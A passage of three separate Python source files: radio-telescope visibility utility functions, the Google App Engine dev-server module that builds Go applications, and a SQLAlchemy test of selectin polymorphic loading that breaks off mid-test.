"""Given a pair of feed indices, return the pair index.
Parameters
----------
i, j : integer
Feed index.
n : integer
Total number of feeds.
Returns
-------
pi : integer
Pair index.
"""
if i <= j:
return (n * (n + 1) // 2) - ((n - i) * (n - i + 1) // 2) + (j - i)
else:
return cmap(j, i, n)
def icmap(ix, n):
"""Inverse feed map.
Parameters
----------
ix : integer
Pair index.
n : integer
Total number of feeds.
Returns
-------
fi, fj : integer
Feed indices.
"""
for ii in range(n):
if cmap(ii, n - 1, n) >= ix:
break
i = ii
j = ix - cmap(i, i, n) + i
return i, j
def find_key(key_list, key):
"""Find the index of a key in a list of keys.
This is a wrapper for the list method `index`
that can search any interable (not just lists)
and will return None if the key is not found.
Parameters
----------
key_list : iterable
key : object to be searched
Returns
-------
index : int or None
The index of `key` in `key_list`.
If `key_list` does not contain `key`,
then None is returned.
"""
try:
return [tuple(x) for x in key_list].index(tuple(key))
except TypeError:
return list(key_list).index(key)
except ValueError:
return None
def find_keys(key_list, keys, require_match=False):
"""Find the indices of keys into a list of keys.
Parameters
----------
key_list : iterable
keys : iterable
require_match : bool
Require that `key_list` contain every element of `keys`,
and if not, raise ValueError.
Returns
-------
indices : list of int or None
List of the same length as `keys` containing
the indices of `keys` in `key_list`. If `require_match`
is False, then this can also contain None for keys
that are not contained in `key_list`.
"""
# Significantly faster than repeated calls to find_key
try:
dct = {tuple(kk): ii for ii, kk in enumerate(key_list)}
index = [dct.get(tuple(key)) for key in keys]
except TypeError:
dct = {kk: ii for ii, kk in enumerate(key_list)}
index = [dct.get(key) for key in keys]
if require_match and any([ind is None for ind in index]):
raise ValueError("Could not find all of the keys.")
else:
return index
def find_inputs(input_index, inputs, require_match=False):
"""Find the indices of inputs into a list of inputs.
This behaves similarly to `find_keys` but will automatically choose the key to
match on.
Parameters
----------
input_index : np.ndarray
inputs : np.ndarray
require_match : bool
Require that `input_index` contain every element of `inputs`,
and if not, raise ValueError.
Returns
-------
indices : list of int or None
List of the same length as `inputs` containing
the indices of `inputs` in `input_inswx`. If `require_match`
is False, then this can also contain None for inputs
that are not contained in `input_index`.
"""
# Significantly faster than repeated calls to find_key
if "correlator_input" in input_index.dtype.fields:
field_to_match = "correlator_input"
elif "chan_id" in input_index.dtype.fields:
field_to_match = "chan_id"
else:
raise ValueError(
"`input_index` must have either a `chan_id` or `correlator_input` field."
)
if field_to_match not in inputs.dtype.fields:
raise ValueError("`inputs` array does not have a `%s` field." % field_to_match)
return find_keys(
input_index[field_to_match], inputs[field_to_match], require_match=require_match
)
def apply_gain(vis, gain, axis=1, out=None, prod_map=None):
"""Apply per input gains to a set of visibilities packed in upper
triangular format.
This allows us to apply the gains while minimising the intermediate
products created.
Parameters
----------
vis : np.ndarray[..., nprod, ...]
Array of visibility products.
gain : np.ndarray[..., ninput, ...]
Array of gains. One gain per input.
axis : integer, optional
The axis along which the inputs (or visibilities) are
contained.
out : np.ndarray
Array to place output in. If :obj:`None` create a new
array. This routine can safely use `out = vis`.
prod_map : ndarray of integer pairs
Gives the mapping from product axis to input pairs. If not supplied,
:func:`icmap` is used.
Returns
-------
out : np.ndarray
Visibility array with gains applied. Same shape as :obj:`vis`.
"""
nprod = vis.shape[axis]
ninput = gain.shape[axis]
if prod_map is None and nprod != (ninput * (ninput + 1) // 2):
raise Exception("Number of inputs does not match the number of products.")
if prod_map is not None:
if len(prod_map) != nprod:
msg = "Length of *prod_map* does not match number of input" " products."
raise ValueError(msg)
# Could check prod_map contents as well, but the loop should give a
# sensible error if this is wrong, and checking is expensive.
else:
prod_map = [icmap(pp, ninput) for pp in range(nprod)]
if out is None:
out = np.empty_like(vis)
elif out.shape != vis.shape:
raise Exception("Output array is wrong shape.")
# Define slices for use in gain & vis selection & combination
gain_vis_slice = tuple(slice(None) for i in range(axis))
# Iterate over input pairs and set gains
for pp in range(nprod):
# Determine the inputs.
ii, ij = prod_map[pp]
# Fetch the gains
gi = gain[gain_vis_slice + (ii,)]
gj = gain[gain_vis_slice + (ij,)].conj()
# Apply the gains and save into the output array.
out[gain_vis_slice + (pp,)] = vis[gain_vis_slice + (pp,)] * gi * gj
return out
def invert_no_zero(x):
"""Return the reciprocal, but ignoring zeros.
Where `x != 0` return 1/x, or just return 0. Importantly this routine does
not produce a warning about zero division.
Parameters
----------
x : np.ndarray
Returns
-------
r : np.ndarray
Return the reciprocal of x.
"""
if not isinstance(x, (np.generic, np.ndarray)):
cond = x == 0
elif np.iscomplexobj(x):
tol = 1.0 / np.finfo(x.real.dtype).max
cond = np.logical_and(np.abs(x.real) < tol, np.abs(x.imag) < tol)
else:
tol = 1.0 / np.finfo(x.dtype).max
cond = np.abs(x) < tol
with np.errstate(divide="ignore", invalid="ignore", over="ignore"):
return np.where(cond, 0.0, 1.0 / x)
def extract_diagonal(utmat, axis=1):
"""Extract the diagonal elements of an upper triangular array.
Parameters
----------
utmat : np.ndarray[..., nprod, ...]
Upper triangular array.
axis : int, optional
Axis of array that is upper triangular.
Returns
-------
diag : np.ndarray[..., ninput, ...]
Diagonal of the array.
"""
# Estimate nside from the array shape
nside = int((2 * utmat.shape[axis]) ** 0.5)
# Check that this nside is correct
if utmat.shape[axis] != (nside * (nside + 1) // 2):
msg = (
"Array length (%i) of axis %i does not correspond upper triangle\
of square matrix"
% (utmat.shape[axis], axis)
)
raise RuntimeError(msg)
# Find indices of the diagonal
diag_ind = [cmap(ii, ii, nside) for ii in range(nside)]
# Construct slice objects representing the axes before and after the product axis
slice0 = (np.s_[:],) * axis
slice1 = (np.s_[:],) * (len(utmat.shape) - axis - 1)
# Extract wanted elements with a giant slice
sl = slice0 + (diag_ind,) + slice1
diag_array = utmat[sl]
return diag_array
def calculate_redundancy(input_flags, prod_map, stack_index, nstack):
"""Calculates the number of redundant baselines that were stacked
to form each unique baseline, accounting for the fact that some fraction
of the inputs are flagged as bad at any given time.
Parameters
----------
input_flags : np.ndarray [ninput, ntime]
Array indicating which inputs were good at each time.
Non-zero value indicates that an input was good.
prod_map: np.ndarray[nprod]
The products that were included in the stack.
Typically found in the `index_map['prod']` attribute of the
`containers.TimeStream` or `containers.SiderealStream` object.
stack_index: np.ndarray[nprod]
The index of the stack axis that each product went into.
Typically found in `reverse_map['stack']['stack']` attribute
of the `containers.Timestream` or `containers.SiderealStream` object.
nstack: int
Total number of unique baselines.
Returns
-------
redundancy : np.ndarray[nstack, ntime]
Array indicating the total number of redundant baselines
with good inputs that were stacked into each unique baseline.
"""
ninput, ntime = input_flags.shape
redundancy = np.zeros((nstack, ntime), dtype=np.float32)
if not np.any(input_flags):
input_flags = np.ones_like(input_flags)
input_flags = np.ascontiguousarray(input_flags.astype(np.float32, copy=False))
pm = structured_to_unstructured(prod_map, dtype=np.int16)
stack_index = np.ascontiguousarray(stack_index.astype(np.int32, copy=False))
# Call fast cython function to do calculation
_calc_redundancy(input_flags, pm, stack_index, nstack, redundancy)
return redundancy
def redefine_stack_index_map(telescope, inputs, prod, stack, reverse_stack):
"""Ensure baselines between unmasked inputs are used to represent each stack.
Parameters
----------
telescope : :class: `drift.core.telescope`
Telescope object containing feed information.
inputs : np.ndarray[ninput,] of dtype=('correlator_input', 'chan_id')
The 'correlator_input' or 'chan_id' of the inputs in the stack.
prod : np.ndarray[nprod,] of dtype=('input_a', 'input_b')
The correlation products as pairs of inputs.
stack : np.ndarray[nstack,] of dtype=('prod', 'conjugate')
The index into the `prod` axis of a characteristic baseline included in the stack.
reverse_stack : np.ndarray[nprod,] of dtype=('stack', 'conjugate')
The index into the `stack` axis that each `prod` belongs.
Returns
-------
stack_new : np.ndarray[nstack,] of dtype=('prod', 'conjugate')
The updated `stack` index map, where each element is an index to a product
consisting of a pair of unmasked inputs.
stack_flag : np.ndarray[nstack,] of dtype=np.bool
Boolean flag that is True if this element of the stack index map is now valid,
and False if none of the baselines that were stacked contained unmasked inputs.
"""
# Determine mapping between inputs in the index_map and
# inputs in the telescope instance
tel_index = find_inputs(telescope.input_index, inputs, require_match=False)
# Create a copy of the stack axis
stack_new = stack.copy()
stack_flag = np.zeros(stack_new.size, dtype=np.bool)
# Loop over the stacked baselines
for sind, (ii, jj) in enumerate(prod[stack["prod"]]):
bi, bj = tel_index[ii], tel_index[jj]
# Check that the represenative pair of inputs are present
# in the telescope instance and not masked.
if (bi is None) or (bj is None) or not telescope.feedmask[bi, bj]:
# Find alternative pairs of inputs using the reverse map
this_stack = np.flatnonzero(reverse_stack["stack"] == sind)
# Loop over alternatives until we find an acceptable pair of inputs
for ts in this_stack:
tp = prod[ts]
ti, tj = tel_index[tp[0]], tel_index[tp[1]]
if (ti is not None) and (tj is not None) and telescope.feedmask[ti, tj]:
stack_new[sind]["prod"] = ts
stack_new[sind]["conjugate"] = reverse_stack[ts]["conjugate"]
stack_flag[sind] = True
break
else:
stack_flag[sind] = True
return stack_new, stack_flag
def polarization_map(index_map, telescope, exclude_autos=True):
"""Map the visibilities corresponding to entries in
pol = ['XX', 'XY', 'YX', 'YY'].
Parameters
----------
index_map : h5py.group or dict
Index map to map into polarizations. Must contain a `stack`
entry and an `input` entry.
telescope : :class: `drift.core.telescope`
Telescope object containing feed information.
exclude_autos: bool
If True (default), auto-correlations are set to -1.
Returns
-------
polmap : array of int
Array of size `nstack`. Each entry is the index to the
corresponding polarization in pol = ['XX', 'XY', 'YX', 'YY']
"""
# Old versions of telescope object don't have the `stack_type`
# attribute. Assume those are of type `redundant`.
try:
teltype = telescope.stack_type
except AttributeError:
teltype = None
msg = (
"Telescope object does not have a `stack_type` attribute.\n"
+ "Assuming it is of type `redundant`"
)
if teltype is not None:
if not (teltype == "redundant"):
msg = "Telescope stack type needs to be 'redundant'. Is {0}"
raise RuntimeError(msg.format(telescope.stack_type))
# Older data's input map has a simpler dtype
try:
input_map = index_map["input"]["chan_id"][:]
except IndexError:
input_map = index_map["input"][:]
pol = ["XX", "XY", "YX", "YY"]
nstack = len(index_map["stack"])
# polmap: indices of each vis product in
# polarization list: ['XX', 'YY', 'XY', 'YX']
polmap = np.zeros(nstack, dtype=int)
# For each entry in stack
for vi in range(nstack):
# Product index
pi = index_map["stack"][vi][0]
# Inputs that go into this product
ipt0 = input_map[index_map["prod"][pi][0]]
ipt1 = input_map[index_map["prod"][pi][1]]
# Exclude autos if exclude_autos == True
if exclude_autos and (ipt0 == ipt1):
polmap[vi] = -1
continue
# Find polarization of first input
if telescope.beamclass[ipt0] == 0:
polstring = "X"
elif telescope.beamclass[ipt0] == 1:
polstring = "Y"
else:
# Not a CHIME feed or not On. Ignore.
polmap[vi] = -1
continue
# Find polarization of second input and add it to polstring
if telescope.beamclass[ipt1] == 0:
polstring += "X"
elif telescope.beamclass[ipt1] == 1:
polstring += "Y"
else:
# Not a CHIME feed or not On. Ignore.
polmap[vi] = -1
continue
# If conjugate, flip polstring ('XY -> 'YX)
if telescope.feedconj[ipt0, ipt1]:
polstring = polstring[::-1]
# Populate polmap
polmap[vi] = pol.index(polstring)
return polmap
def baseline_vector(index_map, telescope):
"""Baseline vectors in meters.
Parameters
----------
index_map : h5py.group or dict
Index map to map into polarizations. Must contain a `stack`
entry and an `input` entry.
telescope : :class: `drift.core.telescope`
Telescope object containing feed information.
Returns
-------
bvec_m : array
Array of shape (2, nstack). The 2D baseline vector
(in meters) for each visibility in index_map['stack']
"""
nstack = len(index_map["stack"])
# Baseline vectors in meters.
bvec_m = np.zeros((2, nstack), dtype=np.float64)
# Older data's input map has a simpler dtype
try:
input_map = index_map["input"]["chan_id"][:]
except IndexError:
input_map = index_map["input"][:]
# Compute all baseline vectors.
for vi in range(nstack):
# Product index
pi = index_map["stack"][vi][0]
# Inputs that go into this product
ipt0 = input_map[index_map["prod"][pi][0]]
ipt1 = input_map[index_map["prod"][pi][1]]
# Beseline vector in meters
unique_index = telescope.feedmap[ipt0, ipt1]
bvec_m[:, vi] = telescope.baselines[unique_index]
# No need to conjugate. Already done in telescope.baselines.
# if telescope.feedconj[ipt0, ipt1]:
# bvec_m[:, vi] *= -1.
return bvec_m
def window_generalised(x, window="nuttall"):
"""A generalised high-order window at arbitrary locations.
Parameters
----------
x : np.ndarray[n]
Location to evaluate at. Values outside the range 0 to 1 are zero.
window : one of {'nuttall', 'blackman_nuttall', 'blackman_harris'}
Type of window function to return.
Returns
-------
w : np.ndarray[n]
Window function.
"""
a_table = {
"uniform": np.array([1, 0, 0, 0]),
"hann": np.array([0.5, -0.5, 0, 0]),
"hanning": np.array([0.5, -0.5, 0, 0]),
"hamming": np.array([0.53836, -0.46164, 0, 0]),
"blackman": np.array([0.42, -0.5, 0.08, 0]),
"nuttall": np.array([0.355768, -0.487396, 0.144232, -0.012604]),
"blackman_nuttall": np.array([0.3635819, -0.4891775, 0.1365995, -0.0106411]),
"blackman_harris": np.array([0.35875, -0.48829, 0.14128, -0.01168]),
}
a = a_table[window]
t = 2 * np.pi * np.arange(4)[:, np.newaxis] * x[np.newaxis, :]
w = (a[:, np.newaxis] * np.cos(t)).sum(axis=0)
w = np.where((x >= 0) & (x <= 1), w, 0)
return w
|
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""An abstraction around the source and executable for a Go application."""
import atexit
import errno
import logging
import os
import os.path
import shutil
import sys
import subprocess
import tempfile
import google
from google.appengine.tools.devappserver2 import errors
from google.appengine.tools.devappserver2 import safe_subprocess
_SDKROOT = os.path.dirname(os.path.dirname(google.__file__))
_GOROOT = os.path.join(_SDKROOT, 'goroot')
_GAB_PATH = os.path.join(_GOROOT, 'bin', 'go-app-builder')
if sys.platform.startswith('win'):
_GAB_PATH += '.exe'
def _rmtree(directory):
try:
shutil.rmtree(directory)
except:
pass
class BuildError(errors.Error):
"""Building the GoApplication failed."""
class GoApplication(object):
"""An abstraction around the source and executable for a Go application."""
def __init__(self, module_configuration):
"""Initializer for Module.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
"""
self._module_configuration = module_configuration
self._go_file_to_mtime = {}
self._extras_hash = None
self._go_executable = None
self._work_dir = None
self._arch = self._get_architecture()
@property
def go_executable(self):
"""The path to the Go executable. None if it has not been built."""
return self._go_executable
def get_environment(self):
"""Return the environment that used be used to run the Go executable."""
environ = {'GOROOT': _GOROOT,
'PWD': self._module_configuration.application_root,
'TZ': 'UTC'}
if 'SYSTEMROOT' in os.environ:
environ['SYSTEMROOT'] = os.environ['SYSTEMROOT']
if 'USER' in os.environ:
environ['USER'] = os.environ['USER']
return environ
@staticmethod
def _get_architecture():
architecture_map = {
'arm': '5',
'amd64': '6',
'386': '8',
}
for platform in os.listdir(os.path.join(_GOROOT, 'pkg', 'tool')):
# Look for 'linux_amd64', 'windows_386', etc.
if '_' not in platform:
continue
architecture = platform.split('_', 1)[1]
if architecture in architecture_map:
return architecture_map[architecture]
if not architecture:
raise BuildError('no compiler found found in goroot (%s)' % _GOROOT)
def _get_gab_args(self):
# Go's regexp package does not implicitly anchor to the start.
nobuild_files = '^' + str(self._module_configuration.nobuild_files)
gab_args = [
_GAB_PATH,
'-app_base', self._module_configuration.application_root,
'-arch', self._arch,
'-binary_name', '_go_app',
'-dynamic',
'-extra_imports', 'appengine_internal/init',
'-goroot', _GOROOT,
'-nobuild_files', nobuild_files,
'-unsafe',
'-work_dir', self._work_dir]
if 'GOPATH' in os.environ:
gab_args.extend(['-gopath', os.environ['GOPATH']])
return gab_args
def _get_go_files_to_mtime(self):
"""Returns a dict mapping all Go files to their mtimes.
Returns:
A dict mapping the path relative to the application root of every .go
file in the application root, or any of its subdirectories, to the file's
modification time.
"""
go_file_to_mtime = {}
for root, _, file_names in os.walk(
self._module_configuration.application_root):
for file_name in file_names:
if not file_name.endswith('.go'):
continue
full_path = os.path.join(root, file_name)
rel_path = os.path.relpath(
full_path, self._module_configuration.application_root)
if self._module_configuration.skip_files.match(rel_path):
continue
if self._module_configuration.nobuild_files.match(rel_path):
continue
try:
go_file_to_mtime[rel_path] = os.path.getmtime(full_path)
except OSError as e:
# Ignore deleted files.
if e.errno != errno.ENOENT:
raise
return go_file_to_mtime
def _get_extras_hash(self):
"""Returns a hash of the names and mtimes of package dependencies.
Returns:
Returns a string representing a hash.
Raises:
BuildError: if the go application builder fails.
"""
gab_args = self._get_gab_args()
gab_args.append('-print_extras_hash')
gab_args.extend(self._go_file_to_mtime)
gab_process = safe_subprocess.start_process(gab_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env={})
gab_stdout, gab_stderr = gab_process.communicate()
if gab_process.returncode:
raise BuildError(
'%s\n\n(Executed command: %s)' % (gab_stderr,
' '.join(gab_args)))
else:
return gab_stdout
def _build(self):
assert self._go_file_to_mtime, 'no .go files'
logging.debug('Building Go application')
gab_args = self._get_gab_args()
gab_args.extend(self._go_file_to_mtime)
gab_process = safe_subprocess.start_process(gab_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env={})
gab_stdout, gab_stderr = gab_process.communicate()
if gab_process.returncode:
raise BuildError(
'%s\n%s\n\n(Executed command: %s)' % (gab_stdout,
gab_stderr,
' '.join(gab_args)))
else:
logging.debug('Build succeeded:\n%s\n%s', gab_stdout, gab_stderr)
self._go_executable = os.path.join(self._work_dir, '_go_app')
def maybe_build(self, maybe_modified_since_last_build):
"""Builds an executable for the application if necessary.
Args:
maybe_modified_since_last_build: True if any files in the application root
or the GOPATH have changed since the last call to maybe_build, False
otherwise. This argument is used to decide whether a build is Required
or not.
Raises:
BuildError: if building the executable fails for any reason.
"""
if not self._work_dir:
self._work_dir = tempfile.mkdtemp('appengine-go-bin')
atexit.register(_rmtree, self._work_dir)
if not os.path.exists(_GAB_PATH):
# TODO: This message should be more useful i.e. point the
# user to an SDK that does have the right components.
raise BuildError('Required Go components are missing from the SDK.')
if self._go_executable and not maybe_modified_since_last_build:
return
(self._go_file_to_mtime,
old_go_file_to_mtime) = (self._get_go_files_to_mtime(),
self._go_file_to_mtime)
if not self._go_file_to_mtime:
raise BuildError('no .go files found in %s' %
self._module_configuration.application_root)
self._extras_hash, old_extras_hash = (self._get_extras_hash(),
self._extras_hash)
if (self._go_executable and
self._go_file_to_mtime == old_go_file_to_mtime and
self._extras_hash == old_extras_hash):
return
if self._go_file_to_mtime != old_go_file_to_mtime:
logging.debug('Rebuilding Go application due to source modification')
elif self._extras_hash != old_extras_hash:
logging.debug('Rebuilding Go application due to GOPATH modification')
else:
logging.debug('Building Go application')
self._build()
|
|
from sqlalchemy import Column
from sqlalchemy import ForeignKey
from sqlalchemy import Integer
from sqlalchemy import String
from sqlalchemy import testing
from sqlalchemy.orm import backref
from sqlalchemy.orm import joinedload
from sqlalchemy.orm import relationship
from sqlalchemy.orm import selectin_polymorphic
from sqlalchemy.orm import selectinload
from sqlalchemy.orm import Session
from sqlalchemy.orm import with_polymorphic
from sqlalchemy.sql.selectable import LABEL_STYLE_TABLENAME_PLUS_COL
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.assertsql import AllOf
from sqlalchemy.testing.assertsql import CompiledSQL
from sqlalchemy.testing.assertsql import EachOf
from sqlalchemy.testing.assertsql import Or
from sqlalchemy.testing.fixtures import fixture_session
from ._poly_fixtures import _Polymorphic
from ._poly_fixtures import Company
from ._poly_fixtures import Engineer
from ._poly_fixtures import GeometryFixtureBase
from ._poly_fixtures import Manager
from ._poly_fixtures import Person
class BaseAndSubFixture(object):
use_options = False
@classmethod
def setup_classes(cls):
Base = cls.DeclarativeBasic
class A(Base):
__tablename__ = "a"
id = Column(Integer, primary_key=True)
adata = Column(String(50))
bs = relationship("B")
type = Column(String(50))
__mapper_args__ = {
"polymorphic_on": type,
"polymorphic_identity": "a",
}
class ASub(A):
__tablename__ = "asub"
id = Column(ForeignKey("a.id"), primary_key=True)
asubdata = Column(String(50))
cs = relationship("C")
if cls.use_options:
__mapper_args__ = {"polymorphic_identity": "asub"}
else:
__mapper_args__ = {
"polymorphic_load": "selectin",
"polymorphic_identity": "asub",
}
class B(Base):
__tablename__ = "b"
id = Column(Integer, primary_key=True)
a_id = Column(ForeignKey("a.id"))
class C(Base):
__tablename__ = "c"
id = Column(Integer, primary_key=True)
a_sub_id = Column(ForeignKey("asub.id"))
@classmethod
def insert_data(cls, connection):
A, B, ASub, C = cls.classes("A", "B", "ASub", "C")
s = Session(connection)
s.add(A(id=1, adata="adata", bs=[B(), B()]))
s.add(
ASub(
id=2,
adata="adata",
asubdata="asubdata",
bs=[B(), B()],
cs=[C(), C()],
)
)
s.commit()
def _run_query(self, q):
ASub = self.classes.ASub
for a in q:
a.bs
if isinstance(a, ASub):
a.cs
def _assert_all_selectin(self, q):
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT a.id AS a_id, a.adata AS a_adata, "
"a.type AS a_type FROM a ORDER BY a.id",
{},
),
AllOf(
EachOf(
CompiledSQL(
"SELECT asub.id AS asub_id, a.id AS a_id, "
"a.type AS a_type, "
"asub.asubdata AS asub_asubdata FROM a JOIN asub "
"ON a.id = asub.id "
"WHERE a.id IN ([POSTCOMPILE_primary_keys]) "
"ORDER BY a.id",
{"primary_keys": [2]},
),
CompiledSQL(
# note this links c.a_sub_id to a.id, even though
# primaryjoin is to asub.id. this is because the
# cols a.id / asub.id are listed in the mapper's
# equivalent_columns so they are guaranteed to store
# the same value.
"SELECT c.a_sub_id AS c_a_sub_id, "
"c.id AS c_id "
"FROM c WHERE c.a_sub_id "
"IN ([POSTCOMPILE_primary_keys])",
{"primary_keys": [2]},
),
),
CompiledSQL(
"SELECT b.a_id AS b_a_id, b.id AS b_id FROM b "
"WHERE b.a_id IN ([POSTCOMPILE_primary_keys])",
{"primary_keys": [1, 2]},
),
),
)
self.assert_sql_execution(testing.db, lambda: self._run_query(result))
class LoadBaseAndSubWEagerRelOpt(
BaseAndSubFixture,
fixtures.DeclarativeMappedTest,
testing.AssertsExecutionResults,
):
use_options = True
def test_load(self):
A, B, ASub, C = self.classes("A", "B", "ASub", "C")
s = fixture_session()
q = (
s.query(A)
.order_by(A.id)
.options(
selectin_polymorphic(A, [ASub]),
selectinload(ASub.cs),
selectinload(A.bs),
)
)
self._assert_all_selectin(q)
class LoadBaseAndSubWEagerRelMapped(
BaseAndSubFixture,
fixtures.DeclarativeMappedTest,
testing.AssertsExecutionResults,
):
use_options = False
def test_load(self):
A, B, ASub, C = self.classes("A", "B", "ASub", "C")
s = fixture_session()
q = (
s.query(A)
.order_by(A.id)
.options(selectinload(ASub.cs), selectinload(A.bs))
)
self._assert_all_selectin(q)
class FixtureLoadTest(_Polymorphic, testing.AssertsExecutionResults):
def test_person_selectin_subclasses(self):
s = fixture_session()
q = s.query(Person).options(
selectin_polymorphic(Person, [Engineer, Manager])
)
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT people.person_id AS people_person_id, "
"people.company_id AS people_company_id, "
"people.name AS people_name, "
"people.type AS people_type FROM people",
{},
),
AllOf(
CompiledSQL(
"SELECT engineers.person_id AS engineers_person_id, "
"people.person_id AS people_person_id, "
"people.type AS people_type, "
"engineers.status AS engineers_status, "
"engineers.engineer_name AS engineers_engineer_name, "
"engineers.primary_language AS engineers_primary_language "
"FROM people JOIN engineers "
"ON people.person_id = engineers.person_id "
"WHERE people.person_id IN ([POSTCOMPILE_primary_keys]) "
"ORDER BY people.person_id",
{"primary_keys": [1, 2, 5]},
),
CompiledSQL(
"SELECT managers.person_id AS managers_person_id, "
"people.person_id AS people_person_id, "
"people.type AS people_type, "
"managers.status AS managers_status, "
"managers.manager_name AS managers_manager_name "
"FROM people JOIN managers "
"ON people.person_id = managers.person_id "
"WHERE people.person_id IN ([POSTCOMPILE_primary_keys]) "
"ORDER BY people.person_id",
{"primary_keys": [3, 4]},
),
),
)
eq_(result, self.all_employees)
def test_load_company_plus_employees(self):
s = fixture_session()
q = (
s.query(Company)
.options(
selectinload(Company.employees).selectin_polymorphic(
[Engineer, Manager]
)
)
.order_by(Company.company_id)
)
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT companies.company_id AS companies_company_id, "
"companies.name AS companies_name FROM companies "
"ORDER BY companies.company_id",
{},
),
CompiledSQL(
"SELECT people.company_id AS people_company_id, "
"people.person_id AS people_person_id, "
"people.name AS people_name, people.type AS people_type "
"FROM people WHERE people.company_id "
"IN ([POSTCOMPILE_primary_keys]) "
"ORDER BY people.person_id",
{"primary_keys": [1, 2]},
),
AllOf(
CompiledSQL(
"SELECT managers.person_id AS managers_person_id, "
"people.person_id AS people_person_id, "
"people.company_id AS people_company_id, "
"people.name AS people_name, people.type AS people_type, "
"managers.status AS managers_status, "
"managers.manager_name AS managers_manager_name "
"FROM people JOIN managers "
"ON people.person_id = managers.person_id "
"WHERE people.person_id IN ([POSTCOMPILE_primary_keys]) "
"ORDER BY people.person_id",
{"primary_keys": [3, 4]},
),
CompiledSQL(
"SELECT engineers.person_id AS engineers_person_id, "
"people.person_id AS people_person_id, "
"people.company_id AS people_company_id, "
"people.name AS people_name, people.type AS people_type, "
"engineers.status AS engineers_status, "
"engineers.engineer_name AS engineers_engineer_name, "
"engineers.primary_language AS engineers_primary_language "
"FROM people JOIN engineers "
"ON people.person_id = engineers.person_id "
"WHERE people.person_id IN ([POSTCOMPILE_primary_keys]) "
"ORDER BY people.person_id",
{"primary_keys": [1, 2, 5]},
),
),
)
eq_(result, [self.c1, self.c2])
class TestGeometries(GeometryFixtureBase):
def test_threelevel_selectin_to_inline_mapped(self):
self._fixture_from_geometry(
{
"a": {
"subclasses": {
"b": {"polymorphic_load": "selectin"},
"c": {
"subclasses": {
"d": {
"polymorphic_load": "inline",
"single": True,
},
"e": {
"polymorphic_load": "inline",
"single": True,
},
},
"polymorphic_load": "selectin",
},
}
}
}
)
a, b, c, d, e = self.classes("a", "b", "c", "d", "e")
sess = fixture_session()
sess.add_all([d(d_data="d1"), e(e_data="e1")])
sess.commit()
q = sess.query(a)
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT a.type AS a_type, a.id AS a_id, "
"a.a_data AS a_a_data FROM a",
{},
),
Or(
CompiledSQL(
"SELECT a.type AS a_type, c.id AS c_id, a.id AS a_id, "
"c.c_data AS c_c_data, c.e_data AS c_e_data, "
"c.d_data AS c_d_data "
"FROM a JOIN c ON a.id = c.id "
"WHERE a.id IN ([POSTCOMPILE_primary_keys]) ORDER BY a.id",
[{"primary_keys": [1, 2]}],
),
CompiledSQL(
"SELECT a.type AS a_type, c.id AS c_id, a.id AS a_id, "
"c.c_data AS c_c_data, "
"c.d_data AS c_d_data, c.e_data AS c_e_data "
"FROM a JOIN c ON a.id = c.id "
"WHERE a.id IN ([POSTCOMPILE_primary_keys]) ORDER BY a.id",
[{"primary_keys": [1, 2]}],
),
),
)
with self.assert_statement_count(testing.db, 0):
eq_(result, [d(d_data="d1"), e(e_data="e1")])
def test_threelevel_selectin_to_inline_options(self):
self._fixture_from_geometry(
{
"a": {
"subclasses": {
"b": {},
"c": {
"subclasses": {
"d": {"single": True},
"e": {"single": True},
}
},
}
}
}
)
a, b, c, d, e = self.classes("a", "b", "c", "d", "e")
sess = fixture_session()
sess.add_all([d(d_data="d1"), e(e_data="e1")])
sess.commit()
c_alias = with_polymorphic(c, (d, e))
q = sess.query(a).options(selectin_polymorphic(a, [b, c_alias]))
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT a.type AS a_type, a.id AS a_id, "
"a.a_data AS a_a_data FROM a",
{},
),
Or(
CompiledSQL(
"SELECT a.type AS a_type, c.id AS c_id, a.id AS a_id, "
"c.c_data AS c_c_data, c.e_data AS c_e_data, "
"c.d_data AS c_d_data "
"FROM a JOIN c ON a.id = c.id "
"WHERE a.id IN ([POSTCOMPILE_primary_keys]) ORDER BY a.id",
[{"primary_keys": [1, 2]}],
),
CompiledSQL(
"SELECT a.type AS a_type, c.id AS c_id, a.id AS a_id, "
"c.c_data AS c_c_data, c.d_data AS c_d_data, "
"c.e_data AS c_e_data "
"FROM a JOIN c ON a.id = c.id "
"WHERE a.id IN ([POSTCOMPILE_primary_keys]) ORDER BY a.id",
[{"primary_keys": [1, 2]}],
),
),
)
with self.assert_statement_count(testing.db, 0):
eq_(result, [d(d_data="d1"), e(e_data="e1")])
def test_threelevel_selectin_to_inline_awkward_alias_options(self):
self._fixture_from_geometry(
{
"a": {
"subclasses": {
"b": {},
"c": {"subclasses": {"d": {}, "e": {}}},
}
}
}
)
a, b, c, d, e = self.classes("a", "b", "c", "d", "e")
sess = fixture_session()
sess.add_all([d(d_data="d1"), e(e_data="e1")])
sess.commit()
from sqlalchemy import select
a_table, c_table, d_table, e_table = self.tables("a", "c", "d", "e")
poly = (
select(a_table.c.id, a_table.c.type, c_table, d_table, e_table)
.select_from(
a_table.join(c_table).outerjoin(d_table).outerjoin(e_table)
)
.set_label_style(LABEL_STYLE_TABLENAME_PLUS_COL)
.alias("poly")
)
c_alias = with_polymorphic(c, (d, e), poly)
q = (
sess.query(a)
.options(selectin_polymorphic(a, [b, c_alias]))
.order_by(a.id)
)
result = self.assert_sql_execution(
testing.db,
q.all,
CompiledSQL(
"SELECT a.type AS a_type, a.id AS a_id, "
"a.a_data AS a_a_data FROM a ORDER BY a.id",
{},
),
Or(
# here, the test is that the adaptation of "a" takes place
CompiledSQL(
"SELECT poly.a_type AS poly_a_type, "
"poly.c_id AS poly_c_id, "
